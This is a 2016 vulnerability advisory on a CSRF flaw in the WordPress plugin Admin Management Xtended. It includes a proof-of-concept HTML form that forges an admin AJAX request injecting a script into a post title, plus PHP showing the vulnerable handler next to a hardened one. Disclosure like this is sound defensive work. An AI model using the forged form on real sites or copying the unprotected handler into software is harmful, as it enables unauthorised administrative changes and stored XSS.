Admin Management Xtended [CSRF]
The Admin Management Xtended plugin suffers from a CSRF vulnerability.
The plugin does not implement any CSRF protection (such as nonce verification) for its registered AJAX actions. A malicious site could therefore trick a logged-in user with administrative rights on the affected website into performing these actions with attacker-chosen data.
These actions include:
- Change post/page title
- Change post/page slug
- Toggle comment status (open/closed) for specific posts/pages
- Change media description
- Change post/page/link visibility
Many more actions are vulnerable to this attack. The ones listed in this report alone could easily lead to a series of further attacks such as Persistent XSS, Sensitive Data Exposure, etc.
PoC
The following form performs a POST request to the vulnerable website and updates the title of the post with id 1, injecting JS code into the title. For this to work, a logged-in user with administrative rights must submit the form.
<h1>Admin Management Xtended - CSRF</h1>
<p>
The form is misleading: it actually performs a request that updates a specific post title.
The new title will contain injected JS code, just to demonstrate how this issue could lead to an XSS attack.
</p>
<form method="post" action="http://wp1.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="ame_save_title">
<!--This field actually expresses the post id-->
<input type="hidden" name="category_id" value="1">
<input type="hidden" name="new_title" value="Old Title<script>alert('XSS')</script>">
<button type="submit" value="Push Me">Push Me</button>
</form>
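To show what the missing check looks like from the plugin side, here is an added illustration in PHP (not the plugin's own code) of a WordPress admin-ajax handler for the ame_save_title action used in the PoC: first the unprotected pattern, then a hardened version that verifies a nonce, checks the user's capability on the target post and sanitises the title. The function names and the nonce action string example_ame_save_title are assumptions; the field names action, category_id and new_title are taken from the PoC above.

```php
<?php
/*
 * Added illustration, not the plugin's code. Handler names and the nonce
 * action string are assumed; request field names come from the PoC.
 */

// VULNERABLE PATTERN: any request naming the action is honoured. A cross-site
// form POST from an administrator's browser carries their login cookies, so
// WordPress authenticates it and the handler runs with administrative rights.
function example_save_title_vulnerable() {
    $post_id   = (int) $_POST['category_id'];   // in the PoC this field carries the post id
    $new_title = $_POST['new_title'];           // attacker-chosen, stored unsanitised
    wp_update_post( array( 'ID' => $post_id, 'post_title' => $new_title ) );
    wp_die();
}

// HARDENED PATTERN
function example_save_title_hardened() {
    // 1. CSRF protection: the request must carry a nonce bound to this action
    //    and to the current user's session. check_ajax_referer() reads the
    //    '_ajax_nonce' (or '_wpnonce') field and, when it does not verify,
    //    replies -1 with HTTP 403 and stops. A third-party page cannot read
    //    the nonce, so its forged POST fails here.
    check_ajax_referer( 'example_ame_save_title' );

    $post_id = isset( $_POST['category_id'] ) ? (int) $_POST['category_id'] : 0;

    // 2. Authorisation: a valid nonce proves intent, not permission, so also
    //    verify that this user may edit this particular post.
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input handling: strip markup so a payload like the PoC's
    //    "<script>alert('XSS')</script>" is not persisted as a stored XSS.
    $new_title = isset( $_POST['new_title'] )
        ? sanitize_text_field( wp_unslash( $_POST['new_title'] ) )
        : '';

    $result = wp_update_post( array( 'ID' => $post_id, 'post_title' => $new_title ), true );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id, 'title' => $new_title ) );
}
// Registered for logged-in users only (wp_ajax_*, not wp_ajax_nopriv_*).
add_action( 'wp_ajax_ame_save_title', 'example_save_title_hardened' );

// Hand the nonce to the plugin's own admin JavaScript, which must then send it
// as the '_ajax_nonce' POST field alongside 'action', 'category_id' and 'new_title'.
function example_enqueue_admin_script( $hook ) {
    wp_enqueue_script( 'example-ame-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-ame-admin', 'exampleAme', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_ame_save_title' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );
```

With the hardened handler in place, the PoC form above still reaches admin-ajax.php with the administrator's cookies, but it cannot supply a valid _ajax_nonce, so check_ajax_referer() rejects it before any post is modified. The capability and sanitisation steps are independent of the nonce and close the two follow-on issues the report names, unauthorised edits and stored XSS.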
- Published: 21 March 2016
- Author: Pan Vag
- References: wpseek.com, wordpress.org
- Plugin version: 2.4.0.1
- Tested on: WordPress 4.4.2
- DWF-2016-87008